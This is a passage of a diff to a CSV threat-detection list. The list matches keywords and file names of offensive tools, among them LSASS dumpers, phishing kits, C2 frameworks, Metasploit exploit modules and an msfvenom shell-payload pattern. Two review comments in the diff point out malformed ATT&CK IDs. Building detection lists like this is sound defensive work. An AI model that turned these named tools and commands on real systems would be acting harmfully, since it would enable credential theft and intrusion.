and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" "*evilgrade*","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","1236","288","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z" -"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*evilmog/ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*eviloffice.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office 
documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*evilqr-main*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-phishing*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilqr-server*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - 
T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*evilsocket*","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" -"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*evil-winrm -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*evil-winrm*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","1","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.dll*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*EvtMuteHook.iobj*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" 
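Review bot: The three gophish rows refreshed in this hunk (`*evilfeed.go*`, `*evilginx-linux*`, `*evilgophish*`) still carry hyphenated technique IDs in `metadata_tool_techniques`, `T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113`, while the other rows use the dotted ATT&CK form (`T1557.002`, `T1003.001`). Because the field is itself delimited by ` - `, a consumer that splits on the delimiter and joins against ATT&CK would presumably get tokens such as `T1565-002` that match nothing, so alerts from these keywords lose their technique mapping. Since the rows are being rewritten anyway, I would change the IDs to the dotted form (`T1565.002 - T1565.003 - T1056.001`). `T1565-012` needs checking against the matrix first, as I am not aware of a T1565 sub-technique with that number.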
@@ -9990,13 +10139,13 @@ "*ewby/Mockingjay_BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*ewok -t *","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like)","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS","1","0","N/A","N/A","1","32","17","2017-04-20T16:24:49Z","2017-05-13T19:51:23Z" "*example-bof.sln*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" 
-"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*examples/netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*Excel-Exploit.git*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*Excel-Exploit-main*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" "*ExcelReflectImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*excelshellinject.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*exchange_proxylogon_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exchange_proxynotshell_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exe_dll_shellcode genetic.config*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*exe_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*exe_to_dll.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" 
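Review bot: The technique field on the re-emitted metasploit rows (`*exchange_proxylogon_rce.*` and `*exchange_proxynotshell_rce.*`) still reads `T1204 -T1210`, which breaks the ` - ` separator used everywhere else in that column; it should be `T1204 - T1210`. A consumer that splits `metadata_tool_techniques` on ` - ` would get the single token `T1204 -T1210` and lose both ATT&CK mappings for these keywords. The same string is on the metasploit rows of the next hunk (`*exec_payload_msi*`, `*exec_shellcode.rb*`, `*execute_dotnet_assembly.*`), and the nimplant row there writes `T1059-001` where the rest of the file uses the `T1059.001` form. As this commit appears only to refresh the GitHub counters on these rows, a validation step in whatever produces the file, checking each ID against `T\d{4}(\.\d{3})?`, would catch such entries before they reach detection content.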
@@ -10011,43 +10160,45 @@ "*exe2powershell.cpp*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell.exe*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*exe2powershell-master*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" -"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*exec CMD=/bin/sh -f elf -o *.elf*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Exec_Command_Silent.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Exec_Command_WithOutput.vbs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*exec_payload_msi*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exec_shellcode.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ExecCmdImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
